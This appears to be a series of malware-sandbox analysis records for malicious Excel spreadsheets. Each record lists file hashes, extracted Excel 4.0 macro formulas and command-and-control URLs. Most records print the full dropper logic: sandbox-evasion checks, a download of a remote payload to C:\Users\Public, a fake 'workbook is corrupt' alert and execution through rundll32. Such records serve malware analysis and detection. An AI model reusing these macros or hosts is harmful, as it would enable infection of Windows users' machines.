{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d2089f158091b219aaef7012d6e936866e9ae2f29f920af38a3108b785bd4ea"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d2089f158091b219aaef7012d6e936866e9ae2f29f920af38a3108b785bd4ea","filesize":112640,"md5":"aacd54f389acbabe23f54958ac8dd803","sha1":"4402641cd569027bc29af678af048ba9d9b3c2af","sha256":"3d2089f158091b219aaef7012d6e936866e9ae2f29f920af38a3108b785bd4ea","sha512":"a419d2c4c75ab272e47609155351078eb79f47a1de1ff9b7f573cb73f2e5756237ed7d1159938f4e74751572e90853e7bb6d2305a9115ebc80f12c397bf2cc1d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d2089f158091b219aaef7012d6e936866e9ae2f29f920af38a3108b785bd4ea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d20dd88f0e935e03c4a4e2577e3825436d7c87e17e2c330d5fad0c887c0403c"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d20dd88f0e935e03c4a4e2577e3825436d7c87e17e2c330d5fad0c887c0403c","filesize":87552,"md5":"0dc1536f0d93b952f17749315c95da22","sha1":"db4dbdbbb8991387cb01c48fc75759c5569ed1a7","sha256":"3d20dd88f0e935e03c4a4e2577e3825436d7c87e17e2c330d5fad0c887c0403c","sha512":"5b57ee1b72cc8cd0b8752bb4501d97c82f3acc599fe9eb75d9b5714d38bd3db92c6854813a24b0adab133c62bb060b6b87ae906827d16e1059a674cfbda71132","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d20dd88f0e935e03c4a4e2577e3825436d7c87e17e2c330d5fad0c887c0403c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$33C$17,R$33C$16,R$33C$15,R$33C$14,R$33C$13,R$33C$12,R$33C$11,R$33C$10,R$33C$9,R$33C$8,R$33C$7,R$33C$6)\nSUM(R$34C$17,R$34C$16,R$34C$15,R$34C$14,R$34C$13,R$34C$12,R$34C$11,R$34C$10,R$34C$9,R$34C$8,R$34C$7,R$34C$6)\nSUM(R$35C$17,R$35C$16,R$35C$15,R$35C$14,R$35C$13,R$35C$12,R$35C$11,R$35C$10,R$35C$9,R$35C$8,R$35C$7,R$35C$6)\nSUM(R$36C$17,R$36C$16,R$36C$15,R$36C$14,R$36C$13,R$36C$12,R$36C$11,R$36C$10,R$36C$9,R$36C$8,R$36C$7,R$36C$6)\nSUM(R$57C$17,R$57C$16,R$57C$15,R$57C$14,R$57C$13,R$57C$12,R$57C$11,R$57C$10,R$57C$9,R$57C$8,R$57C$7,R$57C$6)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d502b76b3dbf55eea895189564bb3933dd7e99158586c9cb70ed310161853f4"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d502b76b3dbf55eea895189564bb3933dd7e99158586c9cb70ed310161853f4","filesize":210432,"md5":"83bcfddc450e7621ed5349d44f8e0b02","sha1":"1987feddbe19270793a089c0f1432eb0ec109fa3","sha256":"3d502b76b3dbf55eea895189564bb3933dd7e99158586c9cb70ed310161853f4","sha512":"c7da1886771cfd0d35e422754adeb14aa66c9297d66a3f10212b8288f3d17a407b100fb56d6871301af5cef9fadc68c3dfd5ad6bb0e945035acb18f37f20550e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d502b76b3dbf55eea895189564bb3933dd7e99158586c9cb70ed310161853f4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-frunt.php","https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-frunt.php\",\"c:\\Users\\Public\\c6wga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php\",\"c:\\Users\\Public\\c6wga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6wga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ldYS5CxXD0\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d51305a262ab6a1f69e99921a15acf6aa0df9374ac3f37df2279bc2b73fbeb4"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d51305a262ab6a1f69e99921a15acf6aa0df9374ac3f37df2279bc2b73fbeb4","filesize":168448,"md5":"aa34431d070e7c12ea5f812c7be2f7a0","sha1":"fd3de4c6cf368020cbf26d0e5b212726cf849dba","sha256":"3d51305a262ab6a1f69e99921a15acf6aa0df9374ac3f37df2279bc2b73fbeb4","sha512":"b4ffac381bbecc6921665f4f9216a4567192671476e5eca0b35b5d06e0c03e5c3b8fd0eac215658db536c2527ee0fdfd0c4485e7422f8350677d50e8c5a59006","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d51305a262ab6a1f69e99921a15acf6aa0df9374ac3f37df2279bc2b73fbeb4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QZebb4DuUv\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d5970f38fae6b7cbb5cae968202ac1c7030f5735cd5a5c9c1f7deb817b4b84a"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d5970f38fae6b7cbb5cae968202ac1c7030f5735cd5a5c9c1f7deb817b4b84a","filesize":209408,"md5":"c168e25aee29c233773fc21d5c415df4","sha1":"b89d6d05e3e3dd388a2589b77c3f52f70e3a89b9","sha256":"3d5970f38fae6b7cbb5cae968202ac1c7030f5735cd5a5c9c1f7deb817b4b84a","sha512":"2857fba0fcdc081b1d58a0fcc541b2669b422af0f4b6f2a3bd26caa829ebfd3eaf9dafa3d89a0611d90c0d01697e95101cb21fc4bb8fa62e8703ca049ac7588f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d5970f38fae6b7cbb5cae968202ac1c7030f5735cd5a5c9c1f7deb817b4b84a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FnndMXPQVP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d665620ea0bd5ea8f95f0e14e273efbbc4ac066e8c716cf07dab7ddd66c36b4"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d665620ea0bd5ea8f95f0e14e273efbbc4ac066e8c716cf07dab7ddd66c36b4","filesize":209920,"md5":"7da08c6c31922daca9b400676137fde0","sha1":"ef9fc0663462a8a4344a40b94e3008e37eaac790","sha256":"3d665620ea0bd5ea8f95f0e14e273efbbc4ac066e8c716cf07dab7ddd66c36b4","sha512":"883e14bb6826d1433306afad775d1bc6d9523d85489a6cc45ea63e64713d8eeb515dd35e2ae0f016fa8662599ed6082ebec09312b904ff5b1f04d299820aca1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d665620ea0bd5ea8f95f0e14e273efbbc4ac066e8c716cf07dab7ddd66c36b4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dfKFHgGQNo\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d77fcf65b4f5113dc989a13c4fe34158313e140308c6aeae49f73ad25bb669d"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d77fcf65b4f5113dc989a13c4fe34158313e140308c6aeae49f73ad25bb669d","filesize":170496,"md5":"da231854acafa47fecf20b81ede61c9a","sha1":"a5edb43c556925213632f25429458aa3d62d1652","sha256":"3d77fcf65b4f5113dc989a13c4fe34158313e140308c6aeae49f73ad25bb669d","sha512":"e4c7c05c0da97b4d621ba9c05d9a709c1ace8e3baded9ec3046ecfca4d57f5016cabadd7ea92c585fcee0a598f96772c8693e4b50f4d996673ea11f236a680ab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d77fcf65b4f5113dc989a13c4fe34158313e140308c6aeae49f73ad25bb669d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5aSURxDjx3\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d835a482603f167f304344c1ae1e8bdc181b13373e347ebb5a4b734e47b1f37"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d835a482603f167f304344c1ae1e8bdc181b13373e347ebb5a4b734e47b1f37","filesize":225280,"md5":"23721c98f0811dff679da6101f72c878","sha1":"c4b49eba90ca08c30ff313f9afacec5480d40024","sha256":"3d835a482603f167f304344c1ae1e8bdc181b13373e347ebb5a4b734e47b1f37","sha512":"992d942b9dca866e64745973a84f3d270f96c38e139f77e67c43e83c95c68b9c8704c2289c9911b17e62eff3ab88821c98d03e69ce4566d04d40a8f701b28cd9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d835a482603f167f304344c1ae1e8bdc181b13373e347ebb5a4b734e47b1f37.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"35CoUo5iHd\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d84d0413f094dc1c77e5fb548fdc38900fd78b7c99258757aa69fc2578ebeea"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d84d0413f094dc1c77e5fb548fdc38900fd78b7c99258757aa69fc2578ebeea","filesize":160768,"md5":"cbab5bf0b9091c521ef1cf2e188e97b4","sha1":"e4355ed592bacdf2243249cb3e94aa5ded2cfb62","sha256":"3d84d0413f094dc1c77e5fb548fdc38900fd78b7c99258757aa69fc2578ebeea","sha512":"0a1fb533adf258bfbb31798b38943d6223df9884c161c91d8e8fdcea61aaccb6fa90211bed41dc99107eef6e20d6e1cb29325bf4a374adc6a925a4e50b0439aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d84d0413f094dc1c77e5fb548fdc38900fd78b7c99258757aa69fc2578ebeea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gUaoHNAAbc\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d8fab43ff2cfa18796950a9c2a7f9743d1b7836809433aeb5688a747e2dc620"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d8fab43ff2cfa18796950a9c2a7f9743d1b7836809433aeb5688a747e2dc620","filesize":142848,"md5":"8110b22e214f4fb76f08f9f76af31648","sha1":"c108c7c69095422d64d3b394fb5bc4b3323ee13d","sha256":"3d8fab43ff2cfa18796950a9c2a7f9743d1b7836809433aeb5688a747e2dc620","sha512":"ddc3b1f4ace7ed06e7f08dbbbc0c149bf84460c39063f5a10d31afdfa2ec278e744c8b5ea4d523557813a8ba0b9f3ef8cbe3709e2b9a2faef0bcd8a3e4297552","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d8fab43ff2cfa18796950a9c2a7f9743d1b7836809433aeb5688a747e2dc620.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"kQ1NXHACWi\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d97d528cd19fe0907a9fa52e5093a918576360ffc71f8159e7f305ccd75da3f"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d97d528cd19fe0907a9fa52e5093a918576360ffc71f8159e7f305ccd75da3f","filesize":142848,"md5":"7feafbd814d83df14c598cd2bc85aa73","sha1":"00713fcd5d62c85a57a25c9295fced3b2b5fff63","sha256":"3d97d528cd19fe0907a9fa52e5093a918576360ffc71f8159e7f305ccd75da3f","sha512":"a8e5b4f568f2c8223c40c8655eb5e8f6a6bf7020cfa4fa4beedf4e18d2b0d63d9d1907d51efc4967e2c3ad97094155e55fdafb2dfad89701d7963b76bae2d242","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d97d528cd19fe0907a9fa52e5093a918576360ffc71f8159e7f305ccd75da3f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9BCD0zPsMc\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d9e6c0c94727f8cc28b31b7b2b57561377e7edfa1e2cc53fc6af1a2c0d04486"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d9e6c0c94727f8cc28b31b7b2b57561377e7edfa1e2cc53fc6af1a2c0d04486","filesize":160768,"md5":"5f36f4302d0accc2c73cb93c1157940c","sha1":"2447b013852a5d1495c770a023aaea785aa970d3","sha256":"3d9e6c0c94727f8cc28b31b7b2b57561377e7edfa1e2cc53fc6af1a2c0d04486","sha512":"b5d0805779c69ec42d57c3839f89b208985c4b2bb6b840c1971dcc7177528891803de58d828ffb459bb1a40d22a48159f2c1c1830d2caa380c0c28be4815d5f5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d9e6c0c94727f8cc28b31b7b2b57561377e7edfa1e2cc53fc6af1a2c0d04486.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qF46iM6daW\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3da8f45d5f43a4c54e46d88e30f7bb2e77a76d7490183a23e3b75360979c18cd"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3da8f45d5f43a4c54e46d88e30f7bb2e77a76d7490183a23e3b75360979c18cd","filesize":113664,"md5":"042445404a92d6b4928ae44135e92489","sha1":"2f215f503cbb35f7e7872e6fdd335d2d91b1614c","sha256":"3da8f45d5f43a4c54e46d88e30f7bb2e77a76d7490183a23e3b75360979c18cd","sha512":"a1718d6ed563d47efa1417eb6df191073eec5ea5ac8102fdb529c1c368a76322c32dbe7a615723f863ab052764da50b085546611f8965190755a8a1328b6e79d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3da8f45d5f43a4c54e46d88e30f7bb2e77a76d7490183a23e3b75360979c18cd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b2slQwTZvB\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3db9dede1562db43f30674721c46d05202c5e3f52e9e59ccf3b14df0daccd9b3"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3db9dede1562db43f30674721c46d05202c5e3f52e9e59ccf3b14df0daccd9b3","filesize":160768,"md5":"4c70fd8710d9d4d627088aded80355fa","sha1":"a2b82e14d70a0d8cf0d7a01875ee08b339cd7ba2","sha256":"3db9dede1562db43f30674721c46d05202c5e3f52e9e59ccf3b14df0daccd9b3","sha512":"5fb6eb853aa154e5bfef9f355742bc76c12ddb4597c9209a45752b7f061ae003e74857baa786920aecf77b80c75c9d1b95786231696e23630dd53191f17665b2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3db9dede1562db43f30674721c46d05202c5e3f52e9e59ccf3b14df0daccd9b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kHFKfBOFvV\",TRUE)\nGOTO(R$0C$11)"}}}]}
